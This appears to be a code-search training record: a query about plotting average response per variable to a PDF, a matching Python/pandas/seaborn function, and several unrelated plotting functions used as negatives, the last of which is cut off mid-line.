[ "0.58241713", "0.57872564", "0.5712627", "0.5473365", "0.5464034", "0.5438289", "0.54039174", "0.53523386", "0.5309826", "0.5266796", "0.5227246", "0.5216134", "0.51905394", "0.5185898", "0.51729375", "0.5161594", "0.5143175", "0.5138437", "0.5124035", "0.51153386", "0.5106635", "0.50948983", "0.50927824", "0.5091926", "0.5083201", "0.5079717", "0.5075052", "0.5072244", "0.50654215", "0.5063841", "0.50576365", "0.5042167", "0.5040933", "0.50373906", "0.503705", "0.50113255", "0.50070816", "0.49856043", "0.4983203", "0.49799192", "0.49774805", "0.4973956", "0.49721754", "0.49721128", "0.49691868", "0.49553695", "0.49522576", "0.49443406", "0.49419528", "0.4935744", "0.49345595", "0.49308005", "0.49210006", "0.4917369", "0.49171233", "0.49121323", "0.4904817", "0.48938093", "0.48916945", "0.488792", "0.48875734", "0.48809645", "0.48737332", "0.4873445", "0.48659647", "0.48619986", "0.48603666", "0.48582882", "0.4856893", "0.48565707", "0.4856216", "0.48549998", "0.48486587", "0.4848305", "0.48401514", "0.48368624", "0.48360723", "0.4834831", "0.48332337", "0.48314106", "0.48296654", "0.48280975", "0.4827655", "0.48218325", "0.4817879", "0.48126706", "0.48084152", "0.48048773", "0.48045903", "0.48041013", "0.48031673", "0.4799518", "0.47983", "0.4796307", "0.4795676", "0.4795338", "0.4789771", "0.47863775", "0.4785633", "0.47847873" ]
0.5347947
8
Plot average response for all variables in dataset and save plot in pdf dataset pandas dataset prj_info dictionnary containing projet information (response...)
def plot_average_reponse(data,prj_info,pp=PdfPages("exploration.pdf"),TMP=1234,bins=20): #Copy data data = data.copy() #Slice data data = data.sample(n = min(10000,data.shape[0]),random_state=1234) #Colnames var_to_plot = list(set(data.columns.values)-set(prj_info['PRJ_COLUMN'].values())) #Loop figure pbar = ProgressBar() for var in pbar(var_to_plot): #Bins if data[var].dtype.name != "category" and len(data[var].unique())>bins: data["var_new"] = pd.qcut(data[var], bins, duplicates='drop') else: data["var_new"] = data[var].astype(str) data_plot = data.groupby("var_new").agg({prj_info['PRJ_COLUMN']["RESPONSE"]: 'mean', "var_new": 'count'}) #Table data_plot = data.groupby("var_new").agg({prj_info['PRJ_COLUMN']["RESPONSE"]: 'mean', "var_new": 'count'}) #Build plot f, ax = plt.subplots() ax2 =ax.twinx() sns.barplot(x=data_plot.index.tolist(), y="var_new",data=data_plot,ax=ax, color="dodgerblue") sns.pointplot(x=data_plot.index.tolist(), y=prj_info['PRJ_COLUMN']["RESPONSE"], data=data_plot,ax=ax2, color="chartreuse") ax.set_xlabel(var) ax.set_ylabel(var) ax2.set_ylabel(prj_info['PRJ_COLUMN']["RESPONSE"]) plt.title("Average reponse by " + var) plt.setp(ax.xaxis.get_majorticklabels(), rotation=60) pp.savefig(f) return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def avg_response_report(df, var_list, y_obs, y_est, file):\n page = PdfPages(file)\n for var in var_list:\n avg_response(df, var, y_obs, y_est, show=False)\n page.savefig()\n page.close()", "def explore_data(data,prj_info,TMP=1234):\r\n print(\" Data file rows and columns are : \", data.shape)\r\n #Open pdf\r\n pp = PdfPages(prj_info['OUTPUT_PATH'] + \"exploration_\" + str(TMP) + \".pdf\")\r\n\r\n #Plot average\r\n plot_average_reponse(data,prj_info,pp,TMP)\r\n\r\n #Close pdf\r\n pp.close()\r\n return None", "def do_plot(self):\n years = sorted(set(self.prediction_df_without_covid19['Year']))\n predict_without_covid_country = self.prediction_df_without_covid19[\n self.prediction_df_without_covid19['Country'].isin([self.country])].sort_values(['Year'],\n ascending=[True])\n predict_with_covid_country = self.prediction_df_with_covid19[\n self.prediction_df_with_covid19['Country'].isin([self.country])].sort_values(['Year'],\n ascending=[True])\n # ------------------------------------------------------------------------------------------------------\n pa = \\\n predict_without_covid_country.loc[predict_without_covid_country['Year'] == 1990][\n 'Total_CO2_Emissions'].values[\n 0]\n x = []\n for i in range(len(years)):\n x.append(pa * 0.6)\n # ------------------------------------------------------------------------------------------------------\n fig = Figure()\n ax = fig.subplots()\n ax.grid(True, alpha=0.3)\n # plot_title = 'Total CO2 Emissions predicted from 2019-2030 for ' + self.country\n plot_title = 'Total ' + '$CO_2$' + ' Emissions predicted from 2019-2030 for ' + self.country\n label_country_without_covid = 'Total CO2 emissions without covid'\n label_country_with_covid = 'Total CO2 emissions with Covid-19'\n # ------------------------------------------------------------------------------------------------------\n params = {'mathtext.default': 'regular'}\n rcParams.update(params)\n rcParams['font.size'] = 7\n rcParams['lines.markersize'] = 4\n rcParams['figure.figsize'] = [7, 4]\n rcParams['figure.dpi'] = 150\n rcParams['font.family'] = 'Verdana'\n rcParams[\"font.weight\"] = \"normal\"\n font = {'family': 'Verdana',\n 'color': 'xkcd:darkgreen',\n 'weight': 'normal',\n 'size': 9,\n }\n colors = rcParams['axes.prop_cycle'].by_key()['color']\n l1, = ax.plot(years, predict_without_covid_country['Total_CO2_Emissions'], color='xkcd:dark blue green',\n marker='o',\n label=label_country_without_covid)\n l2, = ax.plot(years, predict_with_covid_country['Total_CO2_Emissions'], color='xkcd:neon pink', marker='.',\n label=label_country_with_covid)\n l3, = ax.plot(years, x, color='xkcd:orchid', marker='1')\n print('without covid: ', predict_without_covid_country['Total_CO2_Emissions'].values)\n print('with covid: ', predict_with_covid_country['Total_CO2_Emissions'].values)\n ax.set_xlabel('Years', fontdict=font)\n ax.set_ylabel('Emissions (Gg)', fontdict=font)\n ax.set_title(plot_title, fontsize=12, fontweight='normal')\n ax.patch.set_facecolor('xkcd:green')\n ax.set_facecolor('xkcd:pale green')\n fig.legend((l1, l2, l3), ('Prediction without Covid19', 'Prediction with Covid19', 'Paris Agreement'),\n bbox_to_anchor=(0.907, 0.89))\n fig.savefig(OUTPUT_GRAPH_PATH)", "def data_visualization(df):\r\n\r\n # Visualizing the target variable\r\n plt.figure(figsize=(14, 10))\r\n plt.title(\"Count of bike sharing according to dates\")\r\n plt.plot(df['dteday'], df['cnt'])\r\n #plt.show()\r\n plt.savefig(\"Raw data visualization.png\")\r\n\r\n # box plot for visualizing outliers\r\n fig=px.box(df, y=\"cnt\", notched=True,title='Box plot of the count variable')\r\n #fig.show()\r\n plt.savefig(\"Box Plot.png\")\r\n\r\n # point plot for hourly utilization\r\n for column in ['season', 'yr', 'mnth', 'holiday', 'weekday', 'workingday', 'weathersit']:\r\n hist = px.histogram(df, x=column, y='cnt')\r\n hist.show()\r\n plt.savefig(\"Histogram plots for each column.png\")\r\n sns.pointplot(x=df['hr'], y='cnt', data=df);\r\n plt.title(\"Hourly Utilization\")\r\n plt.ylabel(\"Bike Shares\", fontsize=12)\r\n plt.xlabel(\"Hour\", fontsize=12)\r\n plt.savefig(\"Hourly Utilization point plot.png\", dpi=300, bbox_inches='tight')\r\n\r\n # line plot for hourly utilization\r\n for c in ['holiday','season','workingday']:\r\n sns.lineplot(data=df,x='hr',y='cnt',hue=c)\r\n plt.title('Hourly plot vs count')\r\n plt.savefig(\"Hour vs count plot_main features.png\",dpi=300, bbox_inches='tight')\r\n\r\n # point plots for humidity vs count\r\n sns.pointplot(x='hum', y='cnt', data=df)\r\n plt.title(\"Amount of bike shares vs humidity\", fontsize=25)\r\n plt.xlabel(\"Humidity (%)\", fontsize=20)\r\n plt.ylabel('count of bike shares', fontsize=20)\r\n plt.locator_params(axis='x', nbins=10)\r\n plt.savefig(\"Pointplot of humidity vs count.png\",dpi=300, bbox_inches='tight')\r\n\r\n # box plots of whole df\r\n bx=px.box(df, y=\"cnt\")\r\n bx.show()\r\n\r\n # feature correlation plot\r\n corrs = abs(df.corr())\r\n sns.heatmap(corrs, annot=True)\r\n plt.title(\"Feature Correlation\")\r\n plt.savefig(\"Feature_correlation.png\", dpi=300, bbox_inches='tight')\r\n return plt", "def plot_data(data, par, par_names, par_fixed, output_dir='./'):\n\n datasets = dict()\n\n for data_point in data:\n experiment_name = data_point.par['experiment_name']\n datasets.setdefault(experiment_name, list()).append(data_point)\n\n for experiment_name, dataset in datasets.items():\n\n # ##### Matplotlib ######\n\n name_pdf = ''.join([experiment_name, '.pdf'])\n name_pdf = os.path.join(output_dir, name_pdf)\n\n name_txt = ''.join([experiment_name, '.fit'])\n name_txt = os.path.join(output_dir, name_txt)\n\n print(\" * {} [.fit]\".format(name_pdf))\n\n # #######################\n\n data_grouped = group_data(dataset)\n profiles, r2_min, r2_max = compute_profiles(data_grouped)\n ymin, ymax = set_lim([r2_min, r2_max], 0.10)\n\n with PdfPages(name_pdf) as file_pdf, open(name_txt, 'w') as file_txt:\n\n for (_index, id_), profile in sorted(profiles.items()):\n write_profile(id_, profile, file_txt)\n\n ###### Matplotlib ######\n\n fig = plt.figure(1, frameon=True)\n ax = fig.add_subplot(111)\n\n ax.axhline(0, color='black', alpha=0.87)\n\n ########################\n\n frq, r2_cal, r2_exp, r2_erd, r2_eru = profile[0]\n\n ax.plot(\n frq,\n r2_cal,\n linestyle='-',\n color=red200,\n zorder=2,\n )\n\n ax.errorbar(\n frq,\n r2_exp,\n yerr=[r2_erd, r2_eru],\n fmt='o',\n color=red500,\n zorder=3,\n )\n\n xmin, xmax = set_lim(frq, 0.10)\n\n ax.set_xlim(xmin, xmax)\n ax.set_ylim(ymin, ymax)\n\n ax.xaxis.set_major_locator(MaxNLocator(6))\n ax.yaxis.set_major_locator(MaxNLocator(6))\n\n ax.set_xlabel(r'$\\mathregular{\\nu_{CPMG} \\ (Hz)}$')\n ax.set_ylabel(\n r'$\\mathregular{R_{2,eff} \\ (s^{-1})}$')\n\n ax.set_title('{:s}'.format(id_.upper()))\n\n fig.tight_layout()\n\n ########################\n\n file_pdf.savefig()\n plt.close()\n\n ########################\n\n return", "def _plot_marginal_pdfs( res, nbins=101, **kwargs):\n\tfrom matplotlib import pyplot as pl\n\timport numpy as np\n\n\tnparam = len(res.vparam_names)\n\t# nrow = np.sqrt( nparam )\n\t# ncol = nparam / nrow + 1\n\tnrow, ncol = 1, nparam\n\n\tpdfdict = _get_marginal_pdfs( res, nbins )\n\n\tfig = plt.gcf()\n\tfor parname in res.vparam_names :\n\t\tiax = res.vparam_names.index( parname )+1\n\t\tax = fig.add_subplot( nrow, ncol, iax )\n\n\t\tparval, pdf, mean, std = pdfdict[parname]\n\t\tax.plot( parval, pdf, **kwargs )\n\t\tif np.abs(std)>=0.1:\n\t\t\tax.text( 0.95, 0.95, '%s %.1f +- %.1f'%( parname, np.round(mean,1), np.round(std,1)),\n\t\t\t\t\t ha='right',va='top',transform=ax.transAxes )\n\t\telif np.abs(std)>=0.01:\n\t\t\tax.text( 0.95, 0.95, '%s %.2f +- %.2f'%( parname, np.round(mean,2), np.round(std,2)),\n\t\t\t\t\t ha='right',va='top',transform=ax.transAxes )\n\t\telif np.abs(std)>=0.001:\n\t\t\tax.text( 0.95, 0.95, '%s %.3f +- %.3f'%( parname, np.round(mean,3), np.round(std,3)),\n\t\t\t\t\t ha='right',va='top',transform=ax.transAxes )\n\t\telse :\n\t\t\tax.text( 0.95, 0.95, '%s %.3e +- %.3e'%( parname, mean, std),\n\t\t\t\t\t ha='right',va='top',transform=ax.transAxes )\n\n\tplt.draw()", "def plot(self):\n # get data without totals\n data = self.woe_report[self.woe_report.index != 'total']\n # setup panel\n fig, axs = plt.subplots(1, 3, figsize=(12, 3))\n plt.subplots_adjust(wspace=0.3)\n # first chart\n data['P(Hi|A)'].plot(ax=axs[0], linewidth=3, alpha=0.7)\n data['P(Hi|Ā)'].plot(ax=axs[0], linewidth=3, alpha=0.7)\n axs[0].set_title('Probability distribution')\n axs[0].set_xlabel(data.index.name)\n axs[0].set_ylabel('probability')\n axs[0].legend(['P(Hi|A)', 'P(Hi|Ā)'])\n # second chart\n data['weight-of-evidence'].plot(ax=axs[1], linewidth=3, alpha=0.7)\n axs[1].set_title('WoE')\n axs[1].set_xlabel(data.index.name)\n axs[1].set_ylabel('WoE')\n # third chart\n data['information-value'].plot(ax=axs[2], linewidth=3, alpha=0.7)\n axs[2].set_title('Information value')\n axs[2].set_ylabel('IV')", "def plot_individual(xdict, ydict, xprop, yprop, documents, spline):\n figure_array = {}\n for item in documents:\n xlabel = \"\\\\textbf{\" + label_dict[xprop] + \"}\"\n ylabel = \"\\\\textbf{\" + label_dict[yprop] + \"}\"\n x = xdict[item[\"path_id\"]]\n y = ydict[item[\"path_id\"]]\n # fig_title = item[\"path_id\"] + \"(\" + item[\"pretty_formula\"] + \")\" # Individual traces\n # fig_title = yprop + item[\"cation_type\"] # Plot by cation\n fig_title = yprop # All together\n figure_array[item[\"path_id\"]] = plt.figure(fig_title, figsize=(6,6), dpi=plotting_dpi)\n ax = figure_array[item[\"path_id\"]].add_subplot(111) \n ax.scatter(x,y, s=70, zorder=2, color=color_dict[item[\"cation_type\"]], linewidths=2.5, edgecolors='black')\n if spline:\n tck = interpolate.splrep(x, y, s=0)\n xnew = np.arange(0, 100, 0.1)\n splfit = interpolate.splev(xnew, tck, der=0)\n x = xnew\n y = splfit\n if item[\"path_id\"][-3:] == \"002\":\n ax.plot(x,y, linewidth=2.5, zorder=1, color=color_dict[item[\"cation_type\"]], linestyle='dashed')\n elif item[\"path_id\"][-3:] == \"003\":\n ax.plot(x,y, linewidth=2.5, zorder=1, color=color_dict[item[\"cation_type\"]], linestyle='dotted')\n else:\n ax.plot(x,y, linewidth=2.5, zorder=1, color=color_dict[item[\"cation_type\"]])\n ax.set_xlabel(xlabel, fontsize=24)\n # ax.set_ylim([0,1200])\n # ax.set_xlim([0,100])\n ax.set_ylabel(ylabel, fontsize=24)\n ax.tick_params(axis='x', labelsize=22)\n ax.tick_params(axis='y', labelsize=22)\n border_width = 2\n [i.set_linewidth(border_width) for i in ax.spines.itervalues()]\n plt.tight_layout()\n plt.legend(loc='best', prop={'size': 14})\n plt.rc('text', usetex=True)\n plt.rc('font', family='sans-serif')\n plt.tight_layout()\n plt.show()", "def three_PDF_plots(res=200,table_exts=[''],**kwargs):\n\n p = copy.copy(params)\n for key,val in kwargs.items():\n setattr(p,key,val)\n GR = glo.global_results()\n\n fig, axs = plt.subplots(3, sharex='col',\\\n figsize=(8,15),facecolor='w',\\\n gridspec_kw={'hspace': 0, 'wspace': 0})\n\n # First print cell data distribution\n i = 0\n for gal_index in zip(p.gal_index):\n ax1 = axs[i]\n gal_ob = gal.galaxy(GR=GR, gal_index=gal_index)\n df = gal_ob.cell_data.get_dataframe()\n lognH = np.log10(df.nH)\n hist = np.histogram(lognH[df.nH.values > 0],bins=200,weights=df.m[df.nH.values > 0])\n hist1 = np.asarray(hist[0]) # histogram\n hist2 = np.asarray(hist[1]) # bin edges\n hist1 = hist1*1./sum(hist1)\n ax1.plot(hist2[0:len(hist1)],hist1,drawstyle='steps',ls='-',lw=1.5,\\\n alpha=0.7,color=p.color[0],label='Original cell distribution')\n \n for table_ext,ls,color in zip(table_exts,['--',':'],p.color[1::]):\n if '_M10' in table_ext: lab = 'Mach = 10'\n if '_arepoPDF_M51' in table_ext: lab = 'AREPO parametrized PDF'\n PDF(gal_index,color=color,table_ext=table_ext,ls=ls,res=200,add=True,ax=ax1,label=lab,ow=p.ow)\n \n if i == 0: ax1.legend(loc='upper right',fontsize=12)\n if i == 2: ax1.set_xlabel(getlabel('lnH'))\n ax1.set_ylabel('Mass fraction per bin')\n\n i += 1\n\n if p.savefig:\n if not os.path.isdir(p.d_plot + 'cell_data/PDFs/'): os.mkdir(p.d_plot + 'cell_data/PDFs/') \n plt.savefig(p.d_plot + 'cell_data/PDFs/simple_PDF_%s%s%s_x3.png' % (p.sim_name,p.sim_run,p.table_ext), format='png', dpi=250, facecolor='w')", "def plot_data(self):", "def plot(self):\n # Get data\n #print(self.file_name)\n fig, ax = plb.subplots(1,1,figsize=(18,20))\n for key,value in self.testTrend.items():\n x = np.arange(len(self.data_array))\n y = np.asarray(value)\n plb.plot(x,y, label=key)\n ax.scatter(x, y)\n for i in range(0, len(value)):\n ax.annotate(str(i), (x[i], y[i]))\n # Title\n plb.title(self.file_name)\n # Legend\n plb.legend(bbox_to_anchor=(.05, 1), loc='best', borderaxespad=0.)\n # x ticks\n plb.xticks(np.arange(min(x), max(x) + 1, 2.0))\n #plb.ylim(-250, 1)\n # Show image\n plb.show()", "def resultPlots(record):\n record.createDataFrames()\n \n atmPlot(record)\n clientPlot(record)\n transactionPlot(record)", "def analysis_plot(predictions, ys):\n fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(20, 5))\n\n residuals = ys - predictions\n\n # Plot 1 - Predicted vs Actual\n sns.scatterplot(predictions, ys, ax=ax1)\n ax1.set_title('Predicted vs Actual', fontsize=20)\n ax1.set(xlabel='Predicted Ys', ylabel='Actual Ys')\n\n # Plot 2 - Residuals PLot (predicted vs residuals)\n sns.scatterplot(predictions, residuals, ax=ax2)\n ax2.set_title('Residuals Plot', fontsize=20)\n ax2.set(xlabel='Predicted Ys', ylabel='Residuals')\n\n # Plot 3 - QQ Plot\n sm.qqplot(residuals, ax=ax3, line='s')\n ax3.set_title('QQ Plot- Distribution of Residuals', fontsize=20)\n\n plt.show();", "def plot_parameter_evolution(analyses, pdf=False):\n ncs = np.arange(11, 15)\n genes = set(analyses.gene)\n constructs = set(analyses.construct)\n long_labels = {'bac': 'bac', 'no_pr': 'no pr', 'no_sh': 'no sh'}\n gene_long = {'hb': 'hunchback', 'kn': 'knirps', 'sn': 'snail'}\n y_label = {'j': 'Normalized flux $j$',\n 'rho': 'Site occupation density $\\\\rho$', 'tau': 'Residence time $\\\\tau$ (s)', 'alpha_comb': 'Initiation rate $\\\\alpha$ (pol/min)'}\n\n # Add extra jiggle to be able to distinguish overlapping data points\n x_jiggle = 0.04\n x_shifts = np.array([-1, 0, 1]) * x_jiggle\n\n # Plot parameters\n capsize = 0\n markersize = 4\n lw = 1 # line width\n\n for gene in genes:\n grouped_data = analyses.groupby(by=['gene', 'construct', 'nc'])\n all_means = grouped_data.mean()\n all_stds = grouped_data.std(ddof=1)\n all_ps = analyses.groupby(by=['gene', 'nc']).first()\n\n for quantity in ['j', 'rho', 'tau', 'alpha_comb']:\n ymaxs = {'j': 0.36, 'rho': 0.27, 'tau': 103, 'alpha_comb': 12}\n num = 12\n set_figure_size(num=num, rows=1, page_width_frac=0.5, clear=True, height_factor=0.7)\n fig, ax = plt.subplots(1, 1, num=num, clear=True)\n avg_data, std_data = {}, {}\n for construct in constructs:\n if quantity in ['rho', 'j']:\n avg_data[construct] = all_means.loc[(\n gene, construct, slice(None)), quantity].values\n std_data[construct] = all_stds.loc[(\n gene, construct, slice(None)), quantity].values\n\n elif quantity in ['tau', 'alpha_comb']:\n avg_data[construct] = all_means.loc[(\n gene, construct, slice(None)), quantity].values\n std_data[construct] = np.sqrt(\n all_means.loc[(gene, construct, slice(None)), quantity + 'V'].values)\n\n # Prepare a marker generator and plot the data with errorbars\n marker_gen = itertools.cycle(markers_additivity)\n for i, construct in enumerate(constructs):\n m = next(marker_gen)\n plt.errorbar(\n ncs + x_shifts[i], avg_data[construct],\n yerr=std_data[construct],\n fmt='-' + m, color=colors_additivity[construct],\n capsize=capsize, label=long_labels[construct],\n markersize=markersize, lw=lw)\n\n # Adjust plot\n plt.xlabel('Nuclear cycle')\n plt.ylabel(y_label[quantity])\n plt.ylim(ymin=0, ymax=ymaxs[quantity])\n\n plt.xticks(ncs)\n plt.title(gene_long[gene])\n\n plt.tight_layout()\n plt.show()\n\n # Save figure\n figname = 'additivity_' + quantity + '_' + gene\n figpath = os.path.join(figures_folder, figname)\n fig.savefig(figpath + '.png', pad_inches=0, bbox_inches='tight')\n if pdf:\n fig.savefig(figpath + '.pdf', pad_inches=0, bbox_inches='tight')", "def Diagnostic_plot3(self):\n\n floc = glob.glob('/home/mxs191/Desktop/MathewSchofield/TRG/DetTest/DetTest1_results/Info2Save/*.csv')\n fig = plt.figure()\n plt.rc('font', size=18)\n #fig, ax = generalPlot(xaxis=r'$\\nu / \\mu$Hz', yaxis=r'$P_{\\rm det}$')\n gs = gridspec.GridSpec(1, 2, width_ratios=(4,1))\n ax = fig.add_subplot(gs[0])\n\n for idx, i in enumerate(floc):\n\n d = pd.read_csv(i)\n\n if idx == 0:\n fullpdet = d[['f0', 'Pdet_Kepler', 'Pdet_TESS365', 'Pdet_TESS27']]\n else:\n fullpdet = pd.concat([ fullpdet,\\\n d[['f0', 'Pdet_Kepler', 'Pdet_TESS365', 'Pdet_TESS27']] ])\n\n plt.scatter(d['f0'], d['Pdet_Kepler'], color='b',\\\n label=r\"$\\rm Kepler - 4\\ yrs$\" if idx == 0 else '')\n plt.scatter(d['f0'], d['Pdet_TESS365'], color='orange',\\\n label=r'$\\rm TESS - 1\\ yr$' if idx == 0 else '')\n plt.scatter(d['f0'], d['Pdet_TESS27'], color='g',\\\n label=r'$\\rm TESS - 27\\ days$' if idx == 0 else '')\n\n plt.axhline(fullpdet['Pdet_Kepler'].median(), color='b')\n plt.axhline(fullpdet['Pdet_TESS365'].median(), color='orange')\n plt.axhline(fullpdet['Pdet_TESS27'].median(), color='g')\n ax.legend(loc='lower right')\n plt.ylim([0,1])\n ax.set_ylabel(r'$P_{\\rm det}$')\n ax.set_xlabel(r'$\\nu / \\mu \\rm Hz$')\n\n bx = fig.add_subplot(gs[1])\n import seaborn as sns\n bw = 0.4\n sns.kdeplot(fullpdet['Pdet_Kepler'].values, shade=True, vertical=True, \\\n ax=bx, color='b', bw=bw)\n sns.kdeplot(fullpdet['Pdet_TESS365'].values, shade=True, vertical=True, \\\n ax=bx, color='orange', bw=bw)\n sns.kdeplot(fullpdet['Pdet_TESS27'].values, shade=True, vertical=True, \\\n ax=bx, color='g', bw=bw)\n bx.set_ylim([0.0,1.0])\n bx.set_xticks([])\n bx.set_yticks([])\n bx.set_xlabel(r'$\\rm Density$')\n plt.tight_layout()\n\n plt.show()\n fig.savefig(os.getcwd() + os.sep + 'DetTest1_plots' + os.sep +\\\n 'DetTest_Diagnostic_plot3.pdf')\n sys.exit()", "def plot_pdf(pop_name, pop_val, pop_file, full_pop_file, outdir='.'):\n try:\n plt.style.use(\n \"https://gist.githubusercontent.com/avivajpeyi/4d9839b1ceb7d3651cbb469bc6b0d69b/raw/4ee4a870126653d542572372ff3eee4e89abcab0/publication.mplstyle\")\n except Exception:\n pass\n\n plt.close('all')\n all = pd.read_csv(full_pop_file, sep=\" \")\n all['cos_theta_1'] = all['cos_tilt_1']\n all = process_samples(all)\n sub = pd.read_csv(pop_file, sep=\" \")\n sub = process_samples(sub)\n sub['cos_theta_1'] = sub['cos_tilt_1']\n\n fig, axes = plt.subplots(1, 2, figsize=(10, 5))\n for ax, l in zip(axes, [\"cos_theta_1\", \"cos_theta_12\"]):\n ax.hist(all[l], density=True, histtype='step', color=\"tab:blue\", label=\"ALL\", lw=2, alpha=0.8)\n ax.scatter(all[l], [0 for _ in all[l]], color=\"tab:blue\",marker=\"+\")\n ax.hist(sub[l], density=True, histtype='step', color=\"tab:purple\", label=\"HIGH SNR\", lw=2, alpha=0.6)\n ax.scatter(sub[l], [0 for _ in sub[l]], color=\"tab:purple\", marker=\"+\")\n\n x = np.linspace(-1, 1, 100)\n y1 = TruncatedNormal(mu=1, sigma=pop_val[0], minimum=-1, maximum=1).prob(x)\n y2 = TruncatedNormal(mu=1, sigma=pop_val[1], minimum=-1, maximum=1).prob(x)\n axes[1].plot(x, y2, color='tab:gray', zorder=-10, lw=3, label=\"TRUE\")\n axes[0].plot(x, y1, color='tab:gray', zorder=-10, lw=3)\n\n for i in range(len(axes)):\n if (i == 0):\n axes[i].set_xlabel(r\"$\\cos\\ \\theta_1$\")\n axes[i].set_ylabel(\"PDF\")\n else:\n axes[i].set_xlabel(r\"$\\cos\\ \\theta_{12}$\")\n axes[i].set_yticklabels([])\n axes[i].legend()\n axes[i].grid(False)\n axes[i].set_xlim(-1, 1)\n\n plt.suptitle(f\"POP {pop_name}\")\n plt.tight_layout()\n plt.savefig(f\"{outdir}/pop_trues_{pop_name}.png\")", "def analyse_plots(plot_dict, data_dict) :\n for component in [ '_x', '_y' ] :\n z_pos = array.array( 'd' )\n trans_pos = array.array( 'd' )\n errors = array.array( 'd' )\n zeros = array.array( 'd' )\n\n plot = plot_dict['beam_positions'+component]\n\n for i in range( plot.GetXaxis().GetNbins()+2 ) :\n projection = plot.ProjectionY( \\\n 'profile'+component+'_pro_'+str(i), i, i )\n if projection.GetEntries() == 0 :\n continue\n\n pro_mean, pro_mean_err, pro_std, pro_std_err = \\\n scifi.fit_gaussian( projection )\n\n errors.append( pro_mean_err )\n trans_pos.append( pro_mean )\n z_pos.append( data_dict['station_positions'][ i-6 ] )\n zeros.append(0.0)\n\n position_graph = ROOT.TGraphErrors( len(zeros), z_pos, trans_pos, \\\n zeros, errors )\n position_graph.SetName('beam_profile'+component)\n plot_dict['beam_profile'+component] = position_graph\n\n profile_x = plot_dict['beam_profile_x']\n profile_y = plot_dict['beam_profile_y']\n\n up_x_func = ROOT.TF1( \"up_fit_x\", \"pol1\", -5000.0, 0.0 )\n up_y_func = ROOT.TF1( \"up_fit_y\", \"pol1\", -5000.0, 0.0 )\n down_x_func = ROOT.TF1( \"down_fit_x\", \"pol1\", 0.0, 5000.0 )\n down_y_func = ROOT.TF1( \"down_fit_y\", \"pol1\", 0.0, 5000.0 )\n\n up_fit_x = profile_x.Fit( 'up_fit_x', \"QSR\" )\n up_fit_y = profile_y.Fit( 'up_fit_y', \"QSR\" )\n down_fit_x = profile_x.Fit( 'down_fit_x', \"QSR\" )\n down_fit_y = profile_y.Fit( 'down_fit_y', \"QSR\" )\n\n plot_dict['beam_profile_x_up_fit'] = up_x_func\n plot_dict['beam_profile_y_up_fit'] = up_y_func\n plot_dict['beam_profile_x_down_fit'] = down_x_func\n plot_dict['beam_profile_y_down_fit'] = down_y_func\n\n\n up_beam_gra_x = up_x_func.GetParameter(1)\n up_beam_gra_x_err = up_x_func.GetParError(1)\n up_beam_gra_y = up_y_func.GetParameter(1)\n up_beam_gra_y_err = up_y_func.GetParError(1)\n\n up_beam_pos_x = data_dict['station_positions'][-1]*up_beam_gra_x + up_x_func.GetParameter(0)\n up_beam_pos_x_err = up_x_func.GetParError(0)\n up_beam_pos_y = data_dict['station_positions'][-1]*up_beam_gra_y + up_y_func.GetParameter(0)\n up_beam_pos_y_err = up_y_func.GetParError(0)\n\n up_beam_rot_x = math.atan( up_beam_gra_x )\n up_beam_rot_x_err = up_beam_gra_x_err # Approx linear\n up_beam_rot_y = math.atan( up_beam_gra_y )\n up_beam_rot_y_err = up_beam_gra_y_err # Approx linear\n\n\n\n down_beam_gra_x = down_x_func.GetParameter(1)\n down_beam_gra_x_err = down_x_func.GetParError(1)\n down_beam_gra_y = down_y_func.GetParameter(1)\n down_beam_gra_y_err = down_y_func.GetParError(1)\n\n down_beam_pos_x = data_dict['station_positions'][1]*down_beam_gra_x + down_x_func.GetParameter(0)\n down_beam_pos_x_err = down_x_func.GetParError(0)\n down_beam_pos_y = data_dict['station_positions'][1]*down_beam_gra_y + down_y_func.GetParameter(0)\n down_beam_pos_y_err = down_y_func.GetParError(0)\n\n down_beam_rot_x = math.atan( down_beam_gra_x )\n down_beam_rot_x_err = down_beam_gra_x_err # Approx linear\n down_beam_rot_y = math.atan( down_beam_gra_y )\n down_beam_rot_y_err = down_beam_gra_y_err # Approx linear\n\n\n# down_pos_x = down_beam_pos_x - data_dict['station_positions'][1]*up_beam_gra_x + up_x_func.GetParameter(0)\n# down_pos_x_err = math.sqrt( up_x_func.GetParError(0)**2 + down_beam_pos_x_err**2 )\n# down_pos_y = down_beam_pos_y - data_dict['station_positions'][1]*up_beam_gra_y + up_y_func.GetParameter(0)\n# down_pos_y_err = math.sqrt( up_y_func.GetParError(0)**2 + down_beam_pos_y_err**2 )\n\n length = TRACKER_SEPARATION\n down_pos_x = down_beam_pos_x - ( up_beam_pos_x + length*up_beam_gra_x )\n down_pos_x_err = math.sqrt( up_beam_pos_x_err**2 + down_beam_pos_x_err**2 + (length*up_beam_gra_x_err)**2 )\n down_pos_y = down_beam_pos_y - ( up_beam_pos_y + length*up_beam_gra_y )\n down_pos_y_err = math.sqrt( up_beam_pos_y_err**2 + down_beam_pos_y_err**2 + (length*up_beam_gra_y_err)**2 )\n\n down_rot_x = down_beam_rot_x - up_beam_rot_x\n down_rot_x_err = math.sqrt( down_beam_rot_x_err**2 + up_beam_rot_x_err**2 )\n down_rot_y = down_beam_rot_y - up_beam_rot_y\n down_rot_y_err = math.sqrt( down_beam_rot_y_err**2 + up_beam_rot_y_err**2 )\n\n\n print\n print \"Incoming Beam Misalignments:\"\n print\n print \"Displacement and rotation of beam with respect to upstream tracker:\"\n print\n print \"X Position = {0:0.3f} +/- {1:0.3f} mm\".format( up_beam_pos_x, up_beam_pos_x_err )\n print \"Y Position = {0:0.3f} +/- {1:0.3f} mm\".format( up_beam_pos_y, up_beam_pos_y_err )\n print\n print \"X Rotation = {0:0.3f} +/- {1:0.3f} mrad\".format( up_beam_rot_x*1000.0, up_beam_rot_x_err*1000.0 )\n print \"Y Rotation = {0:0.3f} +/- {1:0.3f} mrad\".format( up_beam_rot_y*1000.0, up_beam_rot_y_err*1000.0 )\n print\n\n print\n print \"Downstream Tracker Beam Misalignments:\"\n print\n print \"Displacement and rotation of beam with respect to downstream tracker:\"\n print\n print \"X Position = {0:0.3f} +/- {1:0.3f} mm\".format( down_beam_pos_x, down_beam_pos_x_err )\n print \"Y Position = {0:0.3f} +/- {1:0.3f} mm\".format( down_beam_pos_y, down_beam_pos_y_err )\n print\n print \"X Rotation = {0:0.3f} +/- {1:0.3f} mrad\".format( down_beam_rot_x*1000.0, down_beam_rot_x_err*1000.0 )\n print \"Y Rotation = {0:0.3f} +/- 